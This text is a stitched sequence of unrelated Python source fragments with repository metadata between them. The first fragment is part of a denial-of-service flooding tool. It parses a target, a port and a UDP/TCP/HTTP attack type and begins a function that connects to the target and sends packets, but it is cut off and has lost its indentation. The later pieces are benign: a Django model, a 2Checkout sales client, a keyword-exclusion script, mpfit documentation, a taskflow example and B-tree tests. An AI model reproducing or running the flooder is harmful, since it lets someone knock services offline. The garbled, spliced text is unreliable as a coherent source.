print ( " Use at your \033[91mown\033[0m risk. I do/will not condone any \033[91millegal\033[0m activity\n I'm not responsible for your actions.\n" )
print ( " Usage and Syntax:\n" )
if sys.argv[0].startswith('./'):
print ( " Syntax: %s -s <target> -p <port> -t <type>" % sys.argv[0] )
pass
else:
print ( " Syntax: ./%s -s <target> -p <port> -t <type>" % sys.argv[0] )
pass
print ( "\n Usage | Options:" )
print ( " -s [--server] - Target server's ip/hostname" )
print ( " -p [--port] - Port to flood with packets" )
print ( " -t [--type] - Type of attack [udp, tcp, http]" )
print ( " -- if 'http' was chosen, define either: '--get' or '--post' for the request method." )
print ( " -m [--message] - Custom tcp/udp/http message to send")
print ( " --port-threading - Enable port threading [ --port doesn't need to be defined if this is ]")
if sys.argv[0].startswith('./'):
print ( "\n Example: %s --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt" % sys.argv[0] )
else:
print ( "\n Example: ./%s --server loop.blackvikingpro.xyz --port 80 --type tcp --message getrekt" % sys.argv[0] )
pass
print("")
pass
def error(message):
print ( "\n \033[93m[*] \033[91m%s\033[0m\n" % message )
pass
def warn(message):
print ( "\n\033[95m [*] \033[93m%s\033[0m\n " % message )
pass
def quick_warn(message):
print ( "\n\033[95m [*] \033[93m%s\033[0m " % message )
def signal_handler(signal, frame):
error( "Exiting cleanly..." )
sys.exit()
pass
signal.signal(signal.SIGINT, signal_handler)
if platform.system() == 'Windows':
warn("This script has not yet been tested on a Windows machine.\nTry it for me and open a new fork on GitHub! (shoutouts will be given)")
elif platform.system() == 'Linux':
_continue = True
pass
if len(sys.argv) == 1:
usage()
sys.exit()
pass
help_args = ['help', '-h', 'h', '--help', '/?', '?']
version_args = ['--version', '-v', 'version', 'ver']
try:
if sys.argv[1] in help_args:
usage()
sys.exit()
elif sys.argv[1] in version_args:
warn("Current Version: %s" % version)
usage()
sys.exit()
pass
except IndexError:
pass
try:
# server = (str(sys.argv[1]), int(sys.argv[2]))
if '-s' in | sys.argv:
s_option_pos = sys.argv.index('-s')
target = sys.argv[(s_option_pos + 1)]
elif '--server' in sys.argv:
s_option_pos = sys.argv.index('--server')
target = sys.argv[(s_option_pos + 1)]
else:
error("Error: Server not defined.")
usage()
sys.exit()
pass
if '-p' in sys.argv:
p_option_pos = sys.argv.index('-p')
port = sys.argv[(p_option_pos + 1)]
eli | f '--port' in sys.argv:
p_option_pos = sys.argv.index('--port')
port = sys.argv[(p_option_pos + 1)]
elif '--port-threading' in sys.argv:
port = 1
else:
error("Error: Port not defined.")
usage()
sys.exit()
pass
if '-t' in sys.argv:
t_option_pos = sys.argv.index('-t')
_type = sys.argv[(t_option_pos + 1)]
elif '--type' in sys.argv:
t_option_pos = sys.argv.index('--type')
_type = sys.argv[(t_option_pos + 1)]
else:
error("Error: Type not defined.")
usage()
sys.exit()
pass
port_threading = False
if '-n' in sys.argv:
n_option_pos = sys.argv.index('-n')
num_threads = int(sys.argv[(n_option_pos + 1)])
elif '--threads' in sys.argv:
n_option_pos = sys.argv.index('--threads')
num_threads = int(sys.argv[(n_option_pos + 1)])
elif '--port-threading' in sys.argv:
port_threading = True
warn("Port threading has been enabled.")
else:
warn("Using only main thread.")
num_threads = 1
pass
    if '--get' in sys.argv or '--GET' in sys.argv:
        _rtype = 'get'
        pass
    elif '--post' in sys.argv or '--POST' in sys.argv:
        _rtype = 'post'
        pass
else:
if _type in ('http', 'HTTP'):
warn("HTTP Request method not chosen. Using 'get'")
_rtype = 'get' # for default
pass
_rtype = 'get' # defining the http type is not required.
pass
if '-m' in sys.argv:
m_option_pos = sys.argv.index('-m')
message = sys.argv[(m_option_pos + 1)]
pass
elif '--message' in sys.argv:
m_option_pos = sys.argv.index('--message')
message = sys.argv[(m_option_pos + 1)]
pass
else:
message = 'getrekt'
pass
    if '-v' in sys.argv or '--verbose' in sys.argv:
        print("Verbose enabled.")
        verbose = True
    else:
        verbose = False
pass
pass
except IndexError:
usage()
sys.exit()
except ValueError as v:
    if '-s' not in sys.argv and '--server' not in sys.argv:
        error("Error: Server not defined.")
        usage()
        sys.exit()
    elif '-p' not in sys.argv and '--port' not in sys.argv:
        error("Error: Port not defined.")
        usage()
        sys.exit()
    elif '-t' not in sys.argv and '--type' not in sys.argv:
        error("Error: Type not defined.")
        usage()
        sys.exit()
    elif '-m' not in sys.argv and '--message' not in sys.argv:
        error("Error: Message not defined.")
        usage()
        sys.exit()
pass
# if client got this far, then we're in business
server = (str(target), int(port))
attack_type = str(_type)
methods = [ 'udp', 'tcp', 'http',
'UDP', 'TCP', 'HTTP', ]
# print ( "You've chosen to attack: %s:%s :with method: %s!" % (server[0], server[1], attack_type) )
# now we must check input
if int(port) > 65535:
error("Port cannot be above '65535'.")
sys.exit()
pass
if attack_type not in methods:
error("Invalid attack type. '%s' is not valid. Please choose either [ udp, tcp, http ]." % attack_type)
sys.exit()
pass
# define some functions for the actual DoS attack
def sendpacket(_type, sock, data, server='', port=''):
if _type in ('tcp', 'TCP'):
try:
sock.send(b'%s' % data.encode())
return True
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
error( "%s" % e )
sock.close()
sys.exit()
pass
elif _type in ('udp', 'UDP'):
try:
sock.sendto(b'%s' % data, (server, port))
return True
# sock.sendto(bytes(data, "utf-8"), (server))
# sock.sendto(b'%s' % data, (server))
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
sock.close() # clean close
sys.exit()
pass
pass
def sendpacket_thread(_type, sock, data, server='', port=''):
if _type in ('tcp', 'TCP'):
try:
sock.send(b'%s' % data.encode())
time.sleep(.01) # to not break the pipe
return True
pass
except socket.error as e:
error( "Couldn't send payload <!-- Server may be down -->" )
sock.close()
sys.exit()
pass
pass
def dos_tcp(server, attack_type, message):
warn ( "You've chosen to attack: \033[96m%s\033[93m at port \033[96m%s\033[93m using attack method: \033[96m%s\033[93m." % (server[0], server[1], attack_type) )
warn ( "Attacking \033[96m%s\033[95m:\033[96m%s\033[93m now!" % (server) )
try:
        if attack_type in ('tcp', 'TCP'):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # define a tcp socket
sock.connect(server)
# sock.connect((server))
except socket.error as e:
# print ( e )
error("Cannot connect to \033[96m%s\033[95m:\033[96m%s\033[91m. <!-- Server |
videntity/tweatwell | apps/tips/models.py | Python | gpl-2.0 | 440 | 0.022727 | from django | .db import models
class Tip | (models.Model):
text = models.TextField(max_length=1000)
date = models.DateField(auto_now_add=True)
class Meta:
ordering = ['-date']
def __unicode__(self):
return '%s ' % (self.text)
class CurrentTip(models.Model):
index = models.IntegerField(max_length=4,default=0)
def __unicode__(self):
return '%s ' % (self.index) |
2Checkout/2checkout-python | twocheckout/sale.py | Python | mit | 3,388 | 0.003542 | from api_request import Api
from util import Util
from twocheckout import Twocheckout
class Sale(Twocheckout):
def __init__(self, dict_):
super(self.__class__, self).__init__(dict_)
@classmethod
def find(cls, params=None):
if params is None:
params = dict()
response = cls(Api.call('sales/detail_sale', params))
return response.sale
@classmethod
def list(cls, params=None):
if params is None:
params = dict()
response = cls(Api.call('sales/list_sales', params))
return response.sale_summary
def refund(self, params=None):
if params | is None:
params = dict | ()
if hasattr(self, 'lineitem_id'):
params['lineitem_id'] = self.lineitem_id
url = 'sales/refund_lineitem'
elif hasattr(self, 'invoice_id'):
params['invoice_id'] = self.invoice_id
url = 'sales/refund_invoice'
else:
params['sale_id'] = self.sale_id
url = 'sales/refund_invoice'
return Sale(Api.call(url, params))
def stop(self, params=None):
if params is None:
params = dict()
if hasattr(self, 'lineitem_id'):
params['lineitem_id'] = self.lineitem_id
return Api.call('sales/stop_lineitem_recurring', params)
elif hasattr(self, 'sale_id'):
active_lineitems = Util.active(self)
if dict(active_lineitems):
result = dict()
i = 0
for k, v in active_lineitems.items():
lineitem_id = v
params = {'lineitem_id': lineitem_id}
result[i] = Api.call('sales/stop_lineitem_recurring', params)
i += 1
response = { "response_code": "OK",
"response_message": str(len(result)) + " lineitems stopped successfully"
}
else:
response = {
"response_code": "NOTICE",
"response_message": "No active recurring lineitems"
}
else:
response = { "response_code": "NOTICE",
"response_message": "This method can only be called on a sale or lineitem"
}
return Sale(response)
def active(self):
active_lineitems = Util.active(self)
if dict(active_lineitems):
result = dict()
i = 0
for k, v in active_lineitems.items():
lineitem_id = v
result[i] = lineitem_id
i += 1
response = { "response_code": "ACTIVE",
"response_message": str(len(result)) + " active recurring lineitems"
}
else:
response = {
"response_code": "NOTICE","response_message":
"No active recurring lineitems"
}
return Sale(response)
def comment(self, params=None):
if params is None:
params = dict()
params['sale_id'] = self.sale_id
return Sale(Api.call('sales/create_comment', params))
def ship(self, params=None):
if params is None:
params = dict()
params['sale_id'] = self.sale_id
return Sale(Api.call('sales/mark_shipped', params))
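# Illustrative usage sketch (the argument keys below are assumptions for
# demonstration, not documented in this file; API credentials are configured
# elsewhere in the twocheckout package):
#   sale = Sale.find({'sale_id': 1234567890})
#   sale.comment({'sale_comment': 'customer requested a refund'})
#   sale.refund({'comment': 'duplicate order', 'category': 5})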
|
SnakeHunt2012/word2vec | post-process/exclusion.py | Python | apache-2.0 | 24,401 | 0.005128 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from re import compile
from copy import copy, deepcopy
from codecs import open
from argparse import ArgumentParser
from itertools import product
DEBUG_FLAG = False
def duration(start, end):
second = (end - start) % 60
minute = (end - start) % 3600 / 60
hour = (end - start) / 3600
return "%d:%02d:%02d" % (hour, minute, second)
def load_brand_dict(dict_file):
brand_set = set()
category_dict = {}
with open(dict_file, 'r') as fd:
for line in fd:
splited_line = line.split()
if len(splited_line) < 2:
continue
category = int(splited_line.pop(0))
brand = " ".join(splited_line)
brand_set.add(brand)
if brand in category_dict:
category_dict[brand].add(category)
else:
category_dict[brand] = set([category])
return brand_set, category_dict
def load_location_dict(tsv_file):
nationality_list = [
"壮族", "藏族", "裕固族", "彝族", "瑶族", "锡伯族", "乌孜别克族", "维吾尔族", "佤族", "土家族",
"土族", "塔塔尔族", "塔吉克族", "水族", "畲族", "撒拉族", "羌族", "普米族", "怒族", "纳西族",
"仫佬族", "苗族", "蒙古族", "门巴族", "毛南族", "满族", "珞巴族", "僳僳族", "黎族", "拉祜族",
"柯尔克孜族", "景颇族", "京族", "基诺族", "回族", "赫哲族", "哈萨克族", "哈尼族", "仡佬族",
"高山族", "鄂温克族", "俄罗斯族", "鄂伦春族", "独龙族", "东乡族", "侗族", "德昂族", "傣族",
"达斡尔族", "朝鲜族", "布依族", "布朗族", "保安族", "白族", "阿昌族", "傈僳族", "汉族", "各族"
]
nationality_list.sort(lambda x, y: cmp(len(x.decode("utf-8")), len(y.decode("utf-8"))), reverse=True)
location_suff | ix_list = []
for natitionality in nationality_list:
location_suffix_list.append(natitionality)
if len(natitionality.decode("utf-8")) > 2:
lo | cation_suffix_list.append(natitionality[:-len("族")])
location_suffix_list = product(location_suffix_list, ["自治区", "自治州", "自治县"])
location_suffix_list = ["".join([a, b]) for a, b in location_suffix_list]
location_suffix_list.extend(["土家族苗族自治县", "依族苗族自治县", "苗族瑶族傣族自治县", "布依族苗族自治州", "回族彝族自治县", "哈尼族彝族傣族自治县", "壮族瑶族自治县", "土家族苗族自治县", "黎族苗族自治县", "苗族侗族自治县", "满族蒙古族自治县", "拉祜族佤族布朗族傣族自治县", "苗族侗族自治州", "土家族苗族自治州", "彝族傣族自治县", "壮族苗族自治州", "黎族苗族自治县", "苗族布依族自治县", "仡佬族苗族自治县", "藏族羌族自治州", "布依族苗族自治州", "土家族苗族自治州", "回族土族自治县", "仡佬族苗族自治县", "彝族回族苗族自治县", "回族土族自治县", "彝族回族自治县", "土家族苗族自治县", "苗族土家族自治县", "蒙古族藏族自治州", "彝族苗族自治县", "保安族东乡族撒拉族自治县", "傣族景颇族自治州", "傣族佤族自治县", "布依族苗族自治县", "哈尼族彝族自治州"])
location_suffix_list.extend(["特别行政区", "省", "市", "县", "区", "镇", "乡", "村"])
location_suffix_list.sort(lambda x, y: cmp(len(x.decode("utf-8")), len(y.decode("utf-8"))), reverse=True)
location_list = []
with open(tsv_file, 'r') as fd:
for row in fd:
splited_row = row.strip().split()
assert len(splited_row) == 3
location_level, location_string, location_dir = splited_row
location_dir = location_dir.split("_")
location_list.append([location_level, location_string, location_dir])
location_dict = dict((location_list[i][1], i) for i in xrange(len(location_list)))
synonymy_map = {}
for location_string in location_dict:
synonymy_map[location_string] = location_string
for location_suffix in location_suffix_list:
if location_string.endswith(location_suffix):
location_synonymy = location_string[:-len(location_suffix)]
if len(location_synonymy.decode("utf-8")) < 2:
break
if location_synonymy in synonymy_map and location_list[location_dict[synonymy_map[location_synonymy]]][0] >= location_list[location_dict[synonymy_map[location_string]]][0]:
break
synonymy_map[location_synonymy] = location_string
break
#for location in synonymy_map:
# if location != synonymy_map[location]:
# print "%s\t->\t%s" % (location, synonymy_map[location])
return location_dict, location_list, synonymy_map
def reduce_set(location_set, location_dict, location_list, synonymy_map):
res_set = set([])
location_set = set(synonymy_map[location_string] for location_string in location_set)
for source_string in location_set:
should_pass = False
for target_string in location_set:
if source_string == target_string:
continue
for target_parent_location in location_list[location_dict[target_string]][2]:
if source_string == target_parent_location:
should_pass = True
break
if should_pass:
break
if not should_pass:
res_set.add(synonymy_map[source_string])
return res_set
def location_judge_relation(query_location_set, bidword_location_set, location_dict, location_list, synonymy_map):
query_location_set = reduce_set(set(synonymy_map[location_string] for location_string in query_location_set), location_dict, location_list, synonymy_map)
bidword_location_set = reduce_set(set(synonymy_map[location_string] for location_string in bidword_location_set), location_dict, location_list, synonymy_map)
for query_location in query_location_set:
found_parent_flag = False
for bidword_location in bidword_location_set:
if query_location == bidword_location:
found_parent_flag = True
break
if synonymy_map[bidword_location] in set(location_list[location_dict[synonymy_map[query_location]]][2]):
found_parent_flag = True
break
if not found_parent_flag:
return False
#if found_parent_flag:
# return True
return True
#return False
def load_school_dict(tsv_file):
school_dict = {}
with open(tsv_file, 'r') as fd:
for row in fd:
splited_row = row.strip().split()
assert len(splited_row) > 0
school_dict[splited_row[0]] = set(splited_row[1:])
school_set = set(school_dict)
synonymy_map = {}
for school in school_set:
synonymy_map[school] = school
for syn_school in school_dict[school]:
if syn_school in synonymy_map:
#raise Exception("%s already in synonymy_map[%s] = %s not %s" % (syn_school, syn_school, synonymy_map[syn_school], school))
continue
synonymy_map[syn_school] = school
return school_set, synonymy_map
def school_judge_relation(query_school_set, bidword_school_set, synonymy_map):
source_set = set()
for school in query_school_set:
source_set.add(synonymy_map[school])
target_set = set()
for school in bidword_school_set:
target_set.add(synonymy_map[school])
return source_set.issubset(target_set)
def stock_judge_relation(query_school_set, bidword_school_set, synonymy_map):
source_set = set()
for school in query_school_set:
source_set.add(synonymy_map[school])
target_set = set()
for school in bidword_school_set:
target_set.add(synonymy_map[school])
return source_set.issubset(target_set)
def load_stock_dict(stock_file):
stock_dict = {}
code_dict = {}
prefix_dict = {} # {A: [((A, B, C), 10010]), ((A, D, E), 10011)]}
with open(stock_file, 'r') as fd:
for line in fd:
splited_line = line.strip().split("\t")
if len(splited_line) != 3:
continue
code, stock_str, stock_seg = splited_line
assert code.isdigit()
if stock_seg not in stock_dict:
stock_dict[stock_seg] = code
if code not in code_dict:
code_dict[code] = stock_seg
for stock in stock_dict:
splited_stock = stock.split()
if splited_stock[0] not in prefix_dict:
prefix_dict[splited_stock[0]] = []
prefix_dict[splited_stock[0]].append((splited_stock, stock_dict[stock]))
return code_dict, stock_dict, prefix_dict
def is_same(list_a, list_b):
if len(list_a) != len(list_b):
return False
for index in range(len(list_a)):
if lis |
neuroneuro15/aspp-test | counter.py | Python | gpl-2.0 | 18 | 0.055556 | print(range | (10)) | |
philrosenfield/ResolvedStellarPops | utils/mpfit/mpfit.py | Python | bsd-3-clause | 93,267 | 0.000729 | """
Perform Levenberg-Marquardt least-squares minimization, based on MINPACK-1.
AUTHORS
The original version of this software, called LMFIT, was written in FORTRAN
as part of the MINPACK-1 package by XXX.
Craig Markwardt converted the FORTRAN code to IDL. The information for the
IDL version is:
Craig B. Markwardt, NASA/GSFC Code 662, Greenbelt, MD 20770
craigm@lheamail.gsfc.nasa.gov
UPDATED VERSIONs can be found on my WEB PAGE:
http://cow.physics.wisc.edu/~craigm/idl/idl.html
Mark Rivers created this Python version from Craig's IDL version.
Mark Rivers, University of Chicago
Building 434A, Argonne National Laboratory
9700 South Cass Avenue, Argonne, IL 60439
rivers@cars.uchicago.edu
Updated versions can be found at http://cars.uchicago.edu/software
Sergey Koposov converted Mark's Python version from Numeric to numpy
Sergey Koposov, University of Cambridge, Institute of Astronomy,
Madingley road, CB3 0HA, Cambridge, UK
koposov@ast.cam.ac.uk
Updated versions can be found at http://code.google.com/p/astrolibpy/source/browse/trunk/
DESCRIPTION
MPFIT uses the Levenberg-Marquardt technique to solve the
least-squares problem. In its typical use, MPFIT will be used to
fit a user-supplied function (the "model") to user-supplied data
points (the "data") by adjusting a set of parameters. MPFIT is
based upon MINPACK-1 (LMDIF.F) by More' and collaborators.
For example, a researcher may think that a set of observed data
points is best modelled with a Gaussian curve. A Gaussian curve is
parameterized by its mean, standard deviation and normalization.
MPFIT will, within certain constraints, find the set of parameters
which best fits the data. The fit is "best" in the least-squares
sense; that is, the sum of the weighted squared differences between
the model and data is minimized.
The Levenberg-Marquardt technique is a particular strategy for
iteratively searching for the best fit. This particular
implementation is drawn from MINPACK-1 (see NETLIB), and is much faster
and more accurate than the version provided in the Scientific Python package
in Scientific.Functions.LeastSquares.
This version allows upper and lower bounding constraints to be placed on each
parameter, or the parameter can be held fixed.
The user-supplied Python function should return an array of weighted
deviations between model and data. In a typical scientific problem
the residuals should be weighted so that each deviate has a
gaussian sigma of 1.0. If X represents values of the independent
variable, Y represents a measurement for each value of X, and ERR
represents the error in the measurements, then the deviates could
be calculated as follows:
DEVIATES = (Y - F(X)) / ERR
where F is the analytical function representing the model. You are
recommended to use the convenience functions MPFITFUN and
MPFITEXPR, which are driver functions that calculate the deviates
for you. If ERR are the 1-sigma uncertainties in Y, then
TOTAL( DEVIATES^2 )
will be the total chi-squared value. MPFIT will minimize the
chi-square value. The values of X, Y and ERR are passed through
MPFIT to the user-supplied function via the FUNCTKW keyword.
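For instance, a minimal residuals function for the Gaussian example above
might be sketched as follows (the parameter ordering p = [mean, sigma, norm]
and the use of numpy are illustrative assumptions, not requirements of
MPFIT):
    import numpy as np
    def gauss_resid(p, fjac=None, x=None, y=None, err=None):
        # Gaussian model built from the mean, sigma and normalization in p
        model = p[2] * np.exp(-0.5 * ((x - p[0]) / p[1])**2)
        status = 0
        return [status, (y - model) / err]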
Simple constraints can be placed on parameter values by using the
PARINFO keyword to MPFIT. See below for a description of this
keywor | d.
MPFIT does not perfor | m more general optimization tasks. See TNMIN
instead. MPFIT is customized, based on MINPACK-1, to the
least-squares minimization problem.
USER FUNCTION
The user must define a function which returns the appropriate
values as specified above. The function should return the weighted
deviations between the model and the data. It should also return a status
flag and an optional partial derivative array. For applications which
use finite-difference derivatives -- the default -- the user
function should be declared in the following way:
def myfunct(p, fjac=None, x=None, y=None, err=None):
# Parameter values are passed in "p"
# If fjac==None then partial derivatives should not be
# computed. It will always be None if MPFIT is called with default
# flag.
model = F(x, p)
# Non-negative status value means MPFIT should continue, negative means
# stop the calculation.
status = 0
return([status, (y-model)/err])
See below for applications with analytical derivatives.
The keyword parameters X, Y, and ERR in the example above are
suggestive but not required. Any parameters can be passed to
MYFUNCT by using the functkw keyword to MPFIT. Use MPFITFUN and
MPFITEXPR if you need ideas on how to do that. The function *must*
accept a parameter list, P.
In general there are no restrictions on the number of dimensions in
X, Y or ERR. However the deviates *must* be returned in a
one-dimensional Numeric array of type Float.
User functions may also indicate a fatal error condition using the
status return described above. If status is set to a number between
-15 and -1 then MPFIT will stop the calculation and return to the caller.
ANALYTIC DERIVATIVES
In the search for the best-fit solution, MPFIT by default
calculates derivatives numerically via a finite difference
approximation. The user-supplied function need not calculate the
derivatives explicitly. However, if you desire to compute them
analytically, then the AUTODERIVATIVE=0 keyword must be passed to MPFIT.
As a practical matter, it is often sufficient and even faster to allow
MPFIT to calculate the derivatives numerically, and so
AUTODERIVATIVE=0 is not necessary.
If AUTODERIVATIVE=0 is used then the user function must check the parameter
FJAC, and if FJAC!=None then return the partial derivative array in the
return list.
def myfunct(p, fjac=None, x=None, y=None, err=None):
# Parameter values are passed in "p"
# If FJAC!=None then partial derivatives must be computed.
# FJAC contains an array of len(p), where each entry
# is 1 if that parameter is free and 0 if it is fixed.
model = F(x, p)
# Non-negative status value means MPFIT should continue, negative means
# stop the calculation.
status = 0
if fjac is not None:
pderiv = zeros([len(x), len(p)], Float)
for j in range(len(p)):
pderiv[:,j] = FGRAD(x, p, j)
else:
pderiv = None
return([status, (y-model)/err, pderiv])
where FGRAD(x, p, i) is a user function which must compute the
derivative of the model with respect to parameter P[i] at X. When
finite differencing is used for computing derivatives (ie, when
AUTODERIVATIVE=1), or when MPFIT needs only the errors but not the
derivatives, the parameter FJAC is set to None.
Derivatives should be returned in the PDERIV array. PDERIV should be an m x
n array, where m is the number of data points and n is the number
of parameters. dp[i,j] is the derivative at the ith point with
respect to the jth parameter.
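For instance, an illustrative sketch of this convention for the straight
line model y = p[0] + p[1]*x would be:
   pderiv = zeros([len(x), 2], Float)
   pderiv[:,0] = 1.    # derivative of the model with respect to p[0]
   pderiv[:,1] = x     # derivative of the model with respect to p[1]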
The derivatives with respect to fixed parameters are ignored; zero
is an appropriate value to insert for those derivatives. Upon
input to the user function, FJAC is set to a vector with the same
length as P, with a value of 1 for a parameter which is free, and a
value of zero for a parameter which is fixed (and hence no
derivative needs to be calculated).
If the data is higher than one dimensional, then the *last*
dimension should be the parameter dimension. Example: fitting a
50x50 image, "dp" should be 50x50xNPAR.
CONSTRAINING PARAMETER VALUES WITH THE PARINFO KEYWORD
The behavior of MPFIT can be modified with respect to each
parameter to be fitted. A parameter value can be fixed; simple
boundary constraints can be imposed; limitations on the parameter
changes can be imposed; properties of the automatic derivative can
be modified; and parameters can be tied to one another.
These properties are governed by the PARINFO structure, which is
passed as a keyword parameter to MPFIT.
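As an illustrative sketch of such a structure (the keys shown --
'value', 'fixed', 'limited' and 'limits' -- follow the usual MPFIT
conventions, which are described in what follows):
   parinfo = [{'value': 0., 'fixed': 0, 'limited': [0, 0],
               'limits': [0., 0.]} for i in range(2)]
   parinfo[0]['fixed'] = 1          # hold the first parameter fixed
   parinfo[1]['limited'] = [1, 0]   # lower bound only on the second
   parinfo[1]['limits'] = [0., 0.]
   m = mpfit.mpfit(myfunct, p0, functkw=fa, parinfo=parinfo)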
PARINFO should be a list of dictionaries, one l |
openstack/taskflow | taskflow/examples/resume_vm_boot.py | Python | apache-2.0 | 9,636 | 0.000934 | # -*- coding: utf-8 -*-
# Copyright (C) 2013 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import hashlib
import logging
import os
import random
import sys
import time
logging.basicConfig(level=logging.ERROR)
self_dir = os.path.abspath(os.path.dirname(__file__))
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir,
os.pardir))
sys.path.insert(0, top_dir)
sys.path.insert(0, self_dir)
import futurist
from oslo_utils import uuidutils
from taskflow import engines
from taskflow import exceptions as exc
from taskflow.patterns import graph_flow as gf
from taskflow.patterns import linear_flow as lf
from taskflow.persistence import models
from taskflow import task
import example_utils as eu # noqa
# INTRO: These examples show how a hierarchy of flows can be used to create a
# vm in a reliable & resumable manner using taskflow + a miniature version of
# what nova does while booting a vm.
@contextlib.contextmanager
def slow_down(how_long=0.5):
try:
yield how_long
finally:
if len(sys.argv) > 1:
            # Only bother to do this if user input was provided.
print("** Ctrl-c me please!!! **")
time.sleep(how_long)
class PrintText(task.Task):
"""Just inserts some text print outs in a workflow."""
def __init__(self, print_what, no_slow=False):
content_hash = hashlib.md5(print_what.encode('utf-8')).hexdigest()[0:8]
super(PrintText, self).__init__(name="Print: %s" % (content_hash))
self._text = print_what
self._no_slow = no_slow
def execute(self):
if self._no_slow:
eu.print_wrapped(self._text)
else:
with slow_down():
eu.print_wrapped(self._text)
class DefineVMSpec(task.Task):
"""Defines a vm specification to be."""
def __init__(self, name):
super(DefineVMSpec, self).__init__(provides='vm_spec', name=name)
def execute(self):
return {
'type': 'kvm',
'disks': 2,
'vcpu': 1,
'ips': 1,
'volumes': 3,
}
class LocateImages(task.Task):
"""Locates where the vm images are."""
def __init__(self, name):
super(LocateImages, self).__init__(provides='image_locations',
name=name)
def execute(self, vm_spec):
image_locations = {}
for i in range(0, vm_spec['disks']):
url = "http://www.yahoo.com/images/%s" % (i)
image_locations[url] = "/tmp/%s.img" % (i)
return image_locations
class DownloadImages(task.Task):
"""Downloads all the vm images."""
def __init__(self, name):
super(DownloadImages, self).__init__(provides='download_paths',
name=name)
def execute(self, image_locations):
for src, loc in image_locations.items():
with slow_down(1):
print("Downloading from %s => %s" % (src, loc))
return sorted(image_locations.values())
class CreateNetworkTpl(task.Task):
"""Generates the network settings file to be placed in the images."""
SYSCONFIG_CONTENTS = """DEVICE=eth%s
BOOTPROTO=static
IPADDR=%s
ONBOOT=yes"""
def __init__(self, name):
super(CreateNetworkTpl, self).__init__(provides='network_settings',
name=name)
def execute(self, ips):
settings = []
for i, ip in enumerate(ips):
settings.append(self.SYSCONFIG_CONTENTS % (i, ip))
return settings
class AllocateIP(task.Task):
"""Allocates the ips for the given vm."""
def __init__(self, name):
super(AllocateIP, self).__init__(provides='ips', name=name)
def execute(self, vm_spec):
ips = []
for _i in range(0, vm_spec.get('ips', 0)):
ips.append("192.168.0.%s" % (random.randint(1, 254)))
return ips
class WriteNetworkSettings(task.Task):
"""Writes all the network settings into the downloaded images."""
def execute(self, download_paths, network_settings):
for j, path in enumerate(download_paths):
with slow_down(1):
print("Mounting %s to /tmp/%s" % (path, j))
for i, setting in enumerate(network_settings):
filename = ("/tmp/etc/sysconfig/network-scripts/"
"ifcfg-eth%s" % (i))
with slow_down(1):
print("Writing to %s" % (filename))
print(setting)
class BootVM(task.Task):
"""Fires off the vm boot operation."""
def execute(self, vm_spec):
print("Starting vm!")
with slow_down(1):
print("Created: %s" % (vm_spec))
class AllocateVolumes(task.Task):
"""Allocates the volumes for the vm."""
def execute(self, vm_spec):
volumes = []
for i in range(0, vm_spec['volumes']):
with slow_down(1):
volumes.append("/dev/vda%s" % (i + 1))
print("Allocated volume %s" % volumes[-1])
return volumes
class FormatVolumes(task.Task):
"""Formats the volumes for the vm."""
def execute(self, volumes):
for v in volumes:
print("Formatting volume %s" % v)
with slow_down(1):
pass
print("Formatted volume %s" % v)
def create_flow():
# Setup the set of things to do (mini-nova).
flow = lf.Flow("root").add(
PrintText("S | tarting vm creation.", no_slow=True),
lf.Flow('vm-maker').add(
# First create a specification for the final vm to-be.
DefineVMSpec("define_spec"),
# This does all the | image stuff.
gf.Flow("img-maker").add(
LocateImages("locate_images"),
DownloadImages("download_images"),
),
# This does all the network stuff.
gf.Flow("net-maker").add(
AllocateIP("get_my_ips"),
CreateNetworkTpl("fetch_net_settings"),
WriteNetworkSettings("write_net_settings"),
),
# This does all the volume stuff.
gf.Flow("volume-maker").add(
AllocateVolumes("allocate_my_volumes", provides='volumes'),
FormatVolumes("volume_formatter"),
),
# Finally boot it all.
BootVM("boot-it"),
),
# Ya it worked!
PrintText("Finished vm create.", no_slow=True),
PrintText("Instance is running!", no_slow=True))
return flow
eu.print_wrapped("Initializing")
# Setup the persistence & resumption layer.
with eu.get_backend() as backend:
# Try to find a previously passed in tracking id...
try:
book_id, flow_id = sys.argv[2].split("+", 1)
if not uuidutils.is_uuid_like(book_id):
book_id = None
if not uuidutils.is_uuid_like(flow_id):
flow_id = None
except (IndexError, ValueError):
book_id = None
flow_id = None
# Set up how we want our engine to run, serial, parallel...
try:
executor = futurist.GreenThreadPoolExecutor(max_workers=5)
except RuntimeError:
# No eventlet installed, just let the default be used instead.
executor = None
# Create/fetch a logbook that will track the workflows work.
book = None
flow_detail = None
if all([book_id, flow_id]):
# Try to find in a prior logbook and flow detail...
with cont |
firi/appengine-btree | btree/btree_test.py | Python | mit | 26,756 | 0.001644 | """
Tests for the BTrees.
"""
import logging
import unittest
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from google.appengine.datastore import datastore_stub_util
from . import BTree, MultiBTree, MultiBTree2
import internal
class BTreeTestBase(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=0)
self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
self.testbed.init_memcache_stub()
# Silences the logging messages during the tests
ndb.add_flow_exception(ValueError)
ndb.add_flow_exception(IndexError)
def tearDown(self):
self.testbed.deactivate()
# helper functions
def issorted(l):
return all(l[i] <= l[i+1] for i in xrange(len(l)-1))
def walk_items(tree):
return tree[:]
def walk_keys(tree):
return [item[0] for item in walk_items(tree)]
class BTreeTest(BTreeTestBase):
def validate_tree(self, tree):
"""
Checks if the tree is still valid. That is the ordering is still
correct.
"""
items = tree[:]
keys = [item[0] for item in items]
self.assertTrue(issorted(keys))
def validate_indices(self, tree):
"""
Checks to see if every item in the tree also has a matching index.
"""
items = tree[:]
for item in items:
key = ndb.Key(MultiBTree2, "tree", internal._BTreeIndex, item[2])
index = key.get()
self.assertIsNotNone(index)
